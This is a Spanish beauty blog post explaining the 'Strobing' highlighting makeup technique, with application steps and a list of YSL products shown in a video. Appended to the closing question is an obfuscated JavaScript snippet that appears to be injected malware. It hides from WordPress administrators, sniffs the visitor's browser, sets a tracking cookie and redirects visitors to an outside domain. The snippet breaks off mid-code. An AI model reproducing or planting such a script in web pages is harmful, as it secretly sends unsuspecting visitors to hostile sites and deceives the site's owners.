strobing

En los últimos meses hemos oído hablar mucho de varias técnicas de maquillaje que las celebrities han puesto de moda, a pesar de tratarse de técnicas que los maquilladores profesionales han utilizado desde siempre.

Después de la famosa técnica del “Contouring” popular gracias a Kim Kardashian por ser su técnica de maquillaje favorita. El “Contouring” consiste en jugar con las sombras para resaltar nuestra estructura oséa a nuestra conveniencia. Ahora la tendencia es el “Strobing” jugar con las luces para conseguir una piel luminosa, saludable y natural. En el mundo del maquillaje es conocida como piel a la francesa.

El “Strobing” es una técnica mucho más sencilla de aplicar que el “Contouring” ya que no requiere tanta precisión ni añadir muchos productos al rostro.

Celebrities como Kendall Jenner o Miranda Kerr se han convertido en los rostros más famosos de esta técnica.

Para aplicar la técnica del “Strobing” aplicaremos iluminadores altamente reflectantes en puntos estratégicos de nuestro rostro. Al contrario del “Contouring” en lugar de marcar las sombras marcaremos los puntos de luz como son la parte alta de los pómulos, sienes, alto del arco de la ceja, punta de la nariz, arco de cupido en los labios y barbilla. Con ellos conseguiremos un rostro multidimensional y lleno de luz.

Encontraremos productos iluminadores en distintas texturas desde iluminadores líquidos que podremos mezclar con nuestra base de maquillaje, iluminadores en polvo o en crema.

Consigue una piel “Strobing” paso a paso:

Para este tipo de maquillaje os recomendamos utilizar una base de maquillaje tipo BB Cream, CC Cream o hidratante con color que nos proporcione una piel natural sin matificar.

Un tip que podemos utilizar es mezclar nuestra crema hidratante con nuestra base de maquillaje de esta forma conseguiremos una base más ligera a la vez que hidratamos la piel.

Si disponemos de iluminador líquido podemos añadir unas gotitas a esta mezcla o BB Cream para aportar un punto de luz al rostro.

Después aplicaremos corrector para unificar el tono en ojeras, aletas de la nariz y barbilla.

En este paso aplicaríamos el iluminador en la parte alta de los pómulos, sienes, alto del arco de la ceja, punta de la nariz, arco de cupido en los labios y barbilla.

Para finalizar el “Strobing” aplicaremos un colorete en crema en un tono melocotón o rosado. Marcamos pestañas con dos capas de máscara de pestañas para darle intensidad a la mirada, definimos cejas y aplicamos un labial en tonos naturales incluso un poquito glossy.

Os dejamos este video explicativo del maquillador Lloyd Simmons de la casa YSL Beauty donde nos muestra esta técnica paso a paso.

Productos utilizados en el vídeo:

  1.  Hidratante Instant Moisture Glow- Top Secrets.
  2. Sérum contorno de ojos Forever Youth Liberator.
  3. Base de maquillaje Le Teint Touche Éclat .
  4. Iluminador Touche Éclat.
  5. Sombra de ojos Mono Couture.
  6. Barra de Labios Volupte Sheer Candy.

 

¿Qué os parece la técnica del “Strobing”? ¿La conociáis? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone